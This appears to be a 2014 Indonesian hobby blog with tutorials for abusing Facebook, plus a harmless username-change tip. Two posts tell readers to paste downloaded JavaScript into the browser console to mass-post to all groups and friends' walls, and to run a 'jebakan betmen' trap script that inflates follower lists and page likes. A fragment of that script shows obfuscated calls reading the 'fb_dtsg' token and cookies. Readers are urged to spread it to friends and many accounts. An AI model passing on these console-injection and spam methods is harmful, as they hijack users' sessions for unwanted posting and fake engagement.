csss

Rabu, 26 Februari 2014

auto post all grups and wall friends (injeck js)

hy mblo apa kabar :) ( :D) abaikan

  • cara post sekali click ke semua grup dan teman :P
  • carnya simple yaitu Injeck JS
  • Jika make CROME gak bisa , silahkan coba dengan MOZILA
  • nah sekarang langsung ajah ke TKP BAHAN untuk yg di siapkan:

  • script detailnya download di bawah ini


  • selamat berkreasi dan gunakan dengan bijaksana
    selamat mencoba SEE YOU :P

    Sabtu, 08 Februari 2014

    cara mendatkan banyak follower facebook-lists dan liker fanpage dengan script jebakan betmen

    hy mblo apa kabar :) (masihh ketemu dengan saya orang terkece se dunia maya :p) abaikan

  • kali ini saya akan kasih trik naikin follow list dan liker fan page
  • cara ini biasa di sebut jebakan betmen apapun namanya mari kita simak
  • nah jadi di sini cara mainya gampang kalian bikin team yg kompak
  • nah kalau sudah silahkan edit list thema yg ada di jebakan betmenya.
  • nah sekarang langsung ajah ke TKP BAHAN untuk yg di siapkan:
    • masuk sini
    • kemudian buat list temannya, pake, nama apa saja kalau sudah simpen idnya.
    • kalau bahan pertama id list dan fp sudah siap BUAT 1POST POTO YG MAU DI BOOM kalau sudah siap

  • edit di bagian paling bawah ["value","fb_dtsg","getElementsByName","match","cookie","597398727006247","
  • nah ganti id post poto tadi dan sunting tinggal ajak temanmu sebnyak2nyabuat mencobanya
  • kuncinya adalah gunakan fb sebnyak2nya untuk mencoba script buatan anda
  • jika anda sudah sukses dan follow list sudah bnyak silahkan exchange
  • di mana grup nya di bawah ini
  • masuk sini


    cara pakainya

    mungkin bagi kalian sudah tak asing lagi yg namanya yg ini
    selain ada versi gresmonkey ada juga yg versi injecknya  menggunakan js
    caranya simple

    cara pakainya

    -buat mozila
    tekan CTRL + SIFT + K
    -buat crom
    tekan F12 pilih console 
    ini script jebakan betmen facebook thema (silahkan di edit) sesuai id fp id fb dan list masing2

  • sampai, jumpa lagi dengan orang terkecedi Dunia maya ini
  • selamatt mencoba.

    ~ SALAM PRAMUKA :)
  • Kamis, 06 Februari 2014

    cara mengganti username facebook yg sudah limit


    hy mblo apa kabar :) (masihh ketemu dengan saya orang terkece se dunia maya :p) abaikan

  • Sebenernya kalo dibilang baru ya ini mang trik baru :P
  • cara mengganti usernamayg sudah limit
  • nah userna itu bukan nama fabnyatapi kayak email fb atau linknya :p
  • contohnya :anazz.dark.inside@facebook.com.
  • nah sekarang langsung ajah ke TKP BAHAN untuk yg di siapkan:
    • masuk sini
    • kemudian buat fan page, pake, nama apa saja trus sunting informasinya.
    • nanti muncul tulisan BUAT ALAMAN WEB FACEBOOK https://www.facebook.com/username?from_page=(ISI ID PAGEMU).

  • nah di situ muncul PILIHAN dan masukin link user facebook mu

  • lebih jelas lihat gambar

    terimakasih atas kunjunganya, kalau mau jadi ganteng gabung di
  • sini join now

  • sampai, jumpa lagi dengan orang terkecedi Dunia maya ini
  • selamatt mencoba.

    ~ SALAM PRAMUKA :)

  • VIdeo Tutor

    INI BUKAN BOKEP :v
    This step-by-step tutorial describes how you can write your own Facebook App in 5 minutes even if you are not a geek. A video screencast for writing Facebook applications is also included for easy reference.
    Loading Feed, Please wait..